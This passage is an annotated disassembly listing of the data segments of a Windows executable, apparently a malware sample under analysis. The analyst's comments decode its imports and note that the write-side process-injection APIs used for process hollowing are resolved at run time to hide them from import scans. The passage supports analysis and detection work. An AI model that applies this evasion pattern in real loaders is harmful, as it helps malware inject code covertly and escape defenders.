; DATA XREF: ___crtLCMapStringA+2o
dd 0FFFFFFFFh, 4053C9h, 4053CDh, 0FFFFFFFFh, 405497h, 40549Bh
dd 0
stru_406D98 _msEH <0FFFFFFFFh, offset loc_405768, offset loc_40576C>
; DATA XREF: ___crtGetStringTypeA+2o
align 8
stru_406DA8 _msEH <0FFFFFFFFh, offset loc_40595E, offset loc_405962>
; DATA XREF: ___convertcp+2o
align 8
; IMAGE_LOAD_CONFIG_DIRECTORY32 (Size = 48h = 72 bytes). The 0Eh zero
; dwords cover the unused fields from TimeDateStamp through EditList, which
; puts the next three at offsets 3Ch/40h/44h: SecurityCookie -> dword_408190
; (the /GS cookie in .data, still at its default 0BB40E64Eh on disk),
; SEHandlerTable -> dword_406E00, SEHandlerCount = 2. The image therefore
; carries a SafeSEH table: only the two handler RVAs listed there are
; accepted as exception handlers for this module.
dd 48h, 0Eh dup(0)
dd offset dword_408190
dd offset dword_406E00
dd 2
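; SafeSEH handler table named by the load config above: two handler RVAs
; (3D68h, 4C50h) and a terminating zero. (The listing had this line fused
; with the next label, `0dword_406E0C`; split back into separate items.)
dword_406E00 dd 3D68h, 4C50h, 0
dword_406E0C dd 2 dup(0) ; sub_403C89:loc_403C9Co
dword_406E14 dd 0 ; sub_403CCD:loc_403CE0o
; IMAGE_IMPORT_DESCRIPTOR array: {OriginalFirstThunk, TimeDateStamp,
; ForwarderChain, Name, FirstThunk} per DLL, terminated by an all-zero
; entry. The Name RVAs land in the hint/name table below: 73B6h =
; "KERNEL32.dll", 73D2h = "USER32.dll", 73EEh = "ADVAPI32.dll". The
; FirstThunk RVAs (6008h, 6104h, 6000h) are the IAT slots the `extrn`
; declarations above stand for.
dd 6E70h, 2 dup(0)               ; KERNEL32: lookup table 6E70h
dd 73B6h, 6008h, 6F6Ch, 2 dup(0) ; KERNEL32 name/IAT; USER32: lookup table 6F6Ch
dd 73D2h, 6104h, 6E68h, 2 dup(0) ; USER32 name/IAT; ADVAPI32: lookup table 6E68h
dd 73EEh, 6000h, 5 dup(0)        ; ADVAPI32 name/IAT; null terminator
; Import lookup tables: RVAs of IMAGE_IMPORT_BY_NAME entries, 0-terminated.
dd 73DEh, 0                      ; ADVAPI32 (1 entry: GetUserNameA)
; KERNEL32: 62 entries (the names are decoded in the comment on the
; hint/name table that follows).
dd 6F94h, 6FA4h, 6FB6h, 6FCAh, 6FDEh, 6FF0h, 7004h, 7018h
dd 702Ah, 703Ah, 7046h, 7054h, 7062h, 706Eh, 7084h, 709Ah
dd 70A6h, 70B8h, 70CAh, 70DAh, 70E8h, 70F6h, 7104h, 7110h
dd 7120h, 712Eh, 713Eh, 714Ch, 7160h, 7174h, 6F82h, 7190h
dd 71ACh, 71C6h, 71DEh, 71F8h, 720Eh, 721Eh, 7238h, 724Ah
dd 7258h, 7262h, 726Eh, 727Ah, 7286h, 729Ch, 72ACh, 72B8h
dd 72D2h, 72E2h, 72F8h, 730Eh, 7328h, 7338h, 734Eh, 735Eh
dd 7370h, 7382h, 7394h, 73A6h, 7180h, 6F74h, 0
dd 73C4h, 0                      ; USER32 (1 entry: MessageBoxA)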
; Import hint/name table (IMAGE_IMPORT_BY_NAME: WORD hint, then the ASCII
; name, padded to an even offset — hence the `align 2` lines). IDA rendered
; much of it as raw dd/db data because the 2-byte hints break its string
; detection; a split entry such as `db 75h` / `db 1, 47h, 65h` /
; 'tModuleFileNameA' is one name (hint 175h, "GetModuleFileNameA").
; Decoded in order, the entries are:
;   KERNEL32: FreeLibrary, GetProcAddress, LoadLibraryA, VirtualQueryEx,
;     ReadProcessMemory, GetThreadContext, CreateProcessA, GetModuleHandleA,
;     VirtualProtectEx, VirtualAllocEx, ResumeThread, ReadFile, GetFileSize,
;     CreateFileA, lstrcmpA, SetFileAttributesA, GetModuleFileNameA,
;     HeapAlloc, GetStartupInfoA, GetCommandLineA, GetVersionExA,
;     HeapDestroy, HeapCreate, VirtualFree, HeapFree, VirtualAlloc,
;     HeapReAlloc, IsBadWritePtr, ExitProcess, TerminateProcess,
;     GetCurrentProcess, WriteFile, GetStdHandle, UnhandledExceptionFilter,
;     FreeEnvironmentStringsA, GetEnvironmentStrings,
;     FreeEnvironmentStringsW, WideCharToMultiByte, GetLastError,
;     GetEnvironmentStringsW, SetHandleCount, GetFileType, GetACP, GetOEMCP,
;     GetCPInfo, RtlUnwind, InterlockedExchange, VirtualQuery, HeapSize,
;     QueryPerformanceCounter, GetTickCount, GetCurrentThreadId,
;     GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA,
;     MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW,
;     GetLocaleInfoA, VirtualProtect, GetSystemInfo
;     (62 names, matching the 62-entry KERNEL32 lookup table above)
;   then "KERNEL32.dll"; MessageBoxA, "USER32.dll"; GetUserNameA,
;   "ADVAPI32.dll".
; Triage note: the process-manipulation APIs imported statically are
; CreateProcessA, GetThreadContext, ReadProcessMemory, VirtualAllocEx,
; VirtualProtectEx and ResumeThread; the write-side counterparts
; (WriteProcessMemory, SetThreadContext, ZwUnmapViewOfSection) are absent
; here and are resolved at run time from the strings at the top of this
; segment, so an import-table-only scan sees half of the picture.
dd 724600EFh, 694C6565h, 72617262h, 1980079h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 10h
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6956037Ah
dd 61757472h, 6F72506Ch, 74636574h, 7845h, 69560374h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2C50000h, 75736552h, 6854656Dh
dd 64616572h, 2A90000h, 64616552h, 656C6946h, 15B0000h
dd 46746547h, 53656C69h, 657A69h, 7243004Dh, 65746165h
dd 656C6946h, 3B00041h, 7274736Ch, 41706D63h, 30C0000h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 376h
aVirtualfree db 'VirtualFree',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 10h
db 10h
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 22Ch
aIsbadwriteptr db 'IsBadWritePtr',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
dd 65530317h, 6E614874h, 43656C64h, 746E756Fh, 15E0000h
dd 46746547h, 54656C69h, 657079h, 654700F5h, 50434154h
dd 18B0000h, 4F746547h, 50434D45h, 0FC0000h, 43746547h
dd 666E4950h, 2CA006Fh, 556C7452h, 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
db 7Bh ; {
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 97h ; —
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 10h
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh, 454B006Fh, 4C454E52h, 642E3233h, 6C6Ch, 654D01DEh
dd 67617373h, 786F4265h, 53550041h, 32335245h, 6C6C642Eh
dd 1230000h, 55746547h, 4E726573h, 41656D61h, 44410000h
dd 49504156h, 642E3233h, 6C6Ch, 0
_rdata ends
; Section 3. (virtual address 00008000)
; Virtual size : 00036AE0 ( 223968.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00006800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
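_data segment para public 'DATA' use32
assume cs:_data
;org 408000h
; Initializer function-pointer table at the start of .data. In the MSVC
; static CRT this is the region start() hands to _initterm before WinMain
; runs (inferred from the CRT members present — ___security_init_cookie,
; ___onexitinit, ___initmbctable; confirm against start). Note the three
; non-CRT entries sub_405F66 / sub_405F83 / sub_405FA0 placed directly after
; ___security_init_cookie: per the "resolved to->" annotations on
; dword_43E528 / dword_43E52C / dword_43E524 at the end of this segment,
; each resolves one API (ZwUnmapViewOfSection, SetThreadContext,
; WriteProcessMemory), so those pointers are populated before WinMain is
; entered. (Several of these items were fused onto single lines in the
; listing; they are split back into one item per line here.)
dword_408000 dd 0
dd offset ___security_init_cookie
dd offset sub_405F66
dd offset sub_405F83
dd offset sub_405FA0
dword_408014 dd 0
dword_408018 dd 0
dd offset ___onexitinit
dd offset ___initmbctable
dword_408024 dd 0
dword_408028 dd 0
dword_40802C dd 0
dword_408030 dd 0
dword_408034 dd 3 dup(0)
; Read by the sample's sub_4010AD; its meaning is not visible here.
dword_408040 dd 6C00h ; sub_4010AD+A9r ...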
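align 10h
; CRT tables: __amsg_exit's exit hook, the __FF_MSGBANNER / __NMSG_WRITE
; message table ({error number, pointer into the R60xx strings in .rdata}
; pairs), the __XcptFilter exception-code table, and the /GS cookie.
off_408050 dd offset __exit ; DATA XREF: __amsg_exit+1Cr
dword_408054 dd 2 ; __FF_MSGBANNER+Er
dd 10h, 0
dword_408060 dd 2 ; __NMSG_WRITE+3Ar ...
off_408064 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5r
; __NMSG_WRITE+112r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40655Ch, 9, 406530h, 0Ah, 406498h, 10h, 40646Ch
dd 11h, 40643Ch, 12h, 406418h, 13h, 4063ECh, 18h, 4063B4h
dd 19h, 40638Ch, 1Ah, 406354h, 1Bh, 40631Ch, 1Ch, 4062F4h
dd 1Dh, 406250h, 78h, 40623Ch, 79h, 40622Ch, 7Ah, 40621Ch
dd 0FCh, 406218h, 0FFh, 406208h
; __XcptFilter table: {NTSTATUS exception code, C signal number, 0}.
dword_4080F8 dd 0C0000005h, 0Bh, 0 ; __XcptFilter+Co  STATUS_ACCESS_VIOLATION -> SIGSEGV (11)
dd 0C000001Dh, 4, 0 ; STATUS_ILLEGAL_INSTRUCTION -> SIGILL (4)
dd 0C0000096h, 4, 0 ; STATUS_PRIVILEGED_INSTRUCTION -> SIGILL
dd 0C000008Dh, 8, 0 ; STATUS_FLOAT_DENORMAL_OPERAND -> SIGFPE (8)
dd 0C000008Eh, 8, 0 ; STATUS_FLOAT_DIVIDE_BY_ZERO -> SIGFPE
dd 0C000008Fh, 8, 0 ; STATUS_FLOAT_INEXACT_RESULT -> SIGFPE
dd 0C0000090h, 8, 0 ; STATUS_FLOAT_INVALID_OPERATION -> SIGFPE
dd 0C0000091h, 8, 0 ; STATUS_FLOAT_OVERFLOW -> SIGFPE
dd 0C0000092h, 8, 0 ; STATUS_FLOAT_STACK_CHECK -> SIGFPE
dd 0C0000093h, 8, 0 ; STATUS_FLOAT_UNDERFLOW -> SIGFPE
dword_408170 dd 3
dword_408174 dd 7
dword_408178 dd 0Ah ; __XcptFilter+6r
dword_40817C dd 8Ch ; __XcptFilter+BAw ...
dd 0FFFFFFFFh, 0A80h, 2 dup(0)
; /GS stack cookie at its compile-time default value; it is the
; SecurityCookie target of the load config in .rdata, and
; ___security_init_cookie (in the initializer table above) is expected to
; overwrite it at startup.
dword_408190 dd 0BB40E64Eh ; sub_40469Cr ...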
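align 8
; Multibyte / locale tables for __setmbcp (library data). byte_408198 is a
; small lookup (1, 2, 4, 8); then per-code-page records whose first dword is
; a code page number (3A4h = 932, 3A8h = 936, 3B5h = 949, 3B6h = 950,
; 551h = 1361); the remaining fields look like packed byte-range pairs
; (e.g. 0FCE09F81h = 81h-9Fh, E0h-FCh, the Shift-JIS lead-byte ranges) —
; exact record layout not confirmed here. dword_408290 = 19930520h is the
; MSVC EH signature used by __NLG_Notify; off_4082A0 / off_4082A4 point at
; the ctype tables in .rdata. (Fused lines split back one item per line.)
byte_408198 db 1 ; DATA XREF: __setmbcp+120r
db 2, 4, 8
align 10h
dword_4081A0 dd 3A4h
dword_4081A4 dd 82798260h
dd 21h, 0
dword_4081B0 dd 0DFA6h
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_408290 dd 19930520h, 3 dup(0) ; __NLG_Notify+2o
off_4082A0 dd offset asc_406968 ; DATA XREF: _x_ismbbtype+18r
; .text:004052B1r ...
; " ((((( H"
off_4082A4 dd offset word_406B6A ; DATA XREF: .text:004052ABr
dd 1, 0
dword_4082B0 dd 1
dd 2Eh, 1, 0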
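; Sample-owned globals, written by sub_401088 / sub_4010AD / sub_401313 /
; sub_4015A2 / sub_40171B. IDA's hFile / hThread names come from the API
; argument each is passed to: sub_40171B stores hFile (and, below,
; nNumberOfBytesToRead), sub_4015A2 stores hThread, which sub_401707 reads.
; sub_4010AD writes single bytes at scattered offsets (+1B, +2B, +34, +43,
; +49, +62, +BD, +11B), which suggests it fills a larger structure
; piecewise — its layout is not visible here. (One fused line split back
; into two items.)
byte_4082C0 db 0 ; DATA XREF: sub_4010AD+49w
; sub_401313+2Ew ...
align 4
dword_4082C4 dd 0 ; sub_4010AD+Er ...
; HANDLE hFile
hFile dd 0 ; DATA XREF: sub_40171B+24w
; sub_40171B+4Dr
byte_4082CC db 0 ; DATA XREF: sub_4010AD+1Bw
; sub_4010AD+43w ...
align 10h
; HANDLE hThread
hThread dd 0 ; DATA XREF: sub_4015A2+14Ew
; sub_401707r
dd 2 dup(0)
dword_4082DC dd 0
byte_4082E0 db 0 ; DATA XREF: sub_4010AD+2Bw
; sub_4010AD+34w ...
align 8
byte_4082E8 db 0 ; DATA XREF: sub_401088+17w
; sub_4010AD+85o ...
; Unaligned dword starting one byte after byte_4082E8.
dword_4082E9 dd 0 ; sub_4010AD+CCr ...
align 10h
dd 4 dup(0)
byte_408300 db 0 ; DATA XREF: sub_4010AD+BDw
align 4
dd 9 dup(0)
byte_408328 db 0 ; DATA XREF: sub_4010AD+62w
align 4
dd 27h dup(0)
byte_4083C8 db 0 ; DATA XREF: sub_4010AD+11Bw
align 4
dd 0Dh dup(0)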
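; 0D844h dwords (36110h bytes) of uninitialized data: the gap between the
; initialized globals and the named objects below, and the reason the
; section is 36AE0h bytes virtual but only 400h on disk. Nothing in this
; listing references it directly; what uses it is not visible here.
; (Several fused lines in this run are split back one item per line.)
dd 0D844h dup(?)
dword_43E510 dd ?
dword_43E514 dd ? ; WinMain(x,x,x,x)+152r
byte_43E518 db ? ; DATA XREF: sub_401707+6w
; WinMain(x,x,x,x)+163w
align 4
; DWORD nNumberOfBytesToRead
; IDA name from the ReadFile argument it feeds: set by sub_40171B (which
; also stores hFile), read by sub_4010AD.
nNumberOfBytesToRead dd ? ; DATA XREF: sub_4010AD+25r
; sub_40171B+2Fw ...
dword_43E520 dd ? ; sub_4015A2+74w ...
; Run-time resolved API pointers (IDA's "resolved to->" annotations). Each
; is written by the routine that sits in the initializer table at the start
; of this segment (408008h-408010h), so they hold their targets before
; WinMain runs if that table is the CRT's _initterm list (confirm against
; start). These are exactly the names absent from the static import table.
dword_43E524 dd ? ; resolved to->KERNEL32.WriteProcessMemory ; sub_405FA0+17w
dword_43E528 dd ? ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_405F66+17w
dword_43E52C dd ? ; resolved to->KERNEL32.SetThreadContext ; sub_405F83+17w
; From here to the end of the segment: CRT runtime state (__setenvp,
; _doexit, __XcptFilter, ___sbh_* small-block heap, __setmbcp locale data,
; __ioinit, __heap_init, ___crtMessageBoxA caches, ...), named by IDA after
; the API parameters they are passed to. Library-owned, not sample-specific.
; char *dword_43E530
dword_43E530 dd ? ; __setenvp:loc_4036D6r ...
align 8
dword_43E538 dd ? ; .text:_fast_error_exitr ...
dword_43E53C dd ? ; .text:004030D1w ...
; int dword_43E540
dword_43E540 dd ? ; _realloc:loc_405050r ...
align 10h
dword_43E550 dd ?
dword_43E554 dd ?
dword_43E558 dd ?
dword_43E55C dd ? ; ___heap_select+9r ...
dword_43E560 dd ?
dword_43E564 dd ?
dword_43E568 dd ?
align 10h
; void *dword_43E570
dword_43E570 dd ? ; __setenvp:loc_403775r ...
align 10h
dword_43E580 dd ?
align 8
byte_43E588 db ? ; DATA XREF: _doexit+2Dw
align 4
dword_43E58C dd ?
dword_43E590 dd ?
dword_43E594 dd ?
dword_43E598 dd ? ; __XcptFilter+73w ...
align 10h
; char Filename[]
; 104h = MAX_PATH; __setargv's GetModuleFileNameA buffer (IDA name from
; that argument).
Filename db 104h dup(?) ; DATA XREF: __setargv+1Co
byte_43E6A4 db ? ; DATA XREF: __setargv+23w
align 4
dword_43E6A8 dd ? ; ___crtGetEnvironmentStringsA+24w ...
dword_43E6AC dd ? ; ___crtMessageBoxA+38w ...
dword_43E6B0 dd ? ; ___crtMessageBoxA:loc_40436Er
dword_43E6B4 dd ? ; ___crtMessageBoxA+D6r
dword_43E6B8 dd ? ; ___crtMessageBoxA:loc_404329r
dword_43E6BC dd ? ; ___crtMessageBoxA+9Cr
dword_43E6C0 dd ? ; .text:004047C6w ...
align 8
dword_43E6C8 dd ? ; __ValidateEH3RN+13Fr ...
align 10h
dword_43E6D0 dd ? ; __ValidateEH3RN+1C4r ...
dd 0Fh dup(?)
; volatile LONG Target
; InterlockedExchange target used by __ValidateEH3RN (IDA name from that
; argument).
Target dd ? ; DATA XREF: __ValidateEH3RN+12Co
; __ValidateEH3RN+191o ...
dword_43E714 dd ? ; .text:00405293r ...
align 10h
; LCID dword_43E720
dword_43E720 dd ? ; ___crtGetStringTypeA+14Ar ...
align 10h
; UINT dword_43E730
dword_43E730 dd ? ; __setmbcp+4Fr ...
align 8
dword_43E738 dd ? ; ___crtLCMapStringA+31w ...
dword_43E73C dd ? ; ___crtGetStringTypeA+2Ew ...
; LCID Locale
Locale dd ? ; DATA XREF: _setSBCS+1Aw
; _setSBUpLow+84r ...
dword_43E744 dd ? ; __setmbcp+14Dw ...
dd 6 dup(?)
byte_43E760 db ? ; DATA XREF: _setSBCS+6o __setmbcp+A7o ...
byte_43E761 db ? ; DATA XREF: _parse_cmdline+47r
; _parse_cmdline+11Dr ...
align 4
dd 40h dup(?)
; UINT CodePage
CodePage dd ? ; DATA XREF: __ismbbkanar _setSBCS+10w ...
align 10h
dword_43E870 dd 4 dup(?) ; __setmbcp+162o ...
byte_43E880 db ? ; DATA XREF: _setSBUpLow:loc_40496Aw
; _setSBUpLow:loc_404987w ...
align 4
dd 3Fh dup(?)
; UINT uNumber
uNumber dd ? ; DATA XREF: __ioinit+1Fw
; __ioinit:loc_403B44r ...
dd 7 dup(?)
dword_43E9A0 dd ? ; __ioinit+3Cr ...
dword_43E9A4 dd 3Fh dup(?)
dword_43EAA0 dd ? ; .text:00403C7Fo
dword_43EAA4 dd ? ; _doexit:loc_40321Br ...
; void *dword_43EAA8
dword_43EAA8 dd ?
dword_43EAAC dd ? ; __setenvp+3r ...
dword_43EAB0 dd ?
align 8
; void *dword_43EAB8
dword_43EAB8 dd ? ; ___sbh_free_block+21Cr ...
dword_43EABC dd ? ; .text:0040211Cr ...
; LPVOID lpMem
lpMem dd ? ; DATA XREF: .text:004020E2r
; .text:loc_402126r ...
dword_43EAC4 dd ? ; __get_sbh_threshold+Er ...
dword_43EAC8 dd ? ; ___sbh_free_block+300w ...
dword_43EACC dd ? ; ___sbh_alloc_new_region+5r ...
dword_43EAD0 dd ? ; ___sbh_free_block+249r ...
; HANDLE hHeap
; The CRT process heap handle set by __heap_init and used by __heap_alloc.
hHeap dd ? ; DATA XREF: __heap_alloc+38r
; __heap_init+19w ...
dword_43EAD8 dd ? ; __heap_alloc:loc_4019D1r ...
dword_43EADC dd ? ; __wincmdln:loc_403678r ...
_data ends
end start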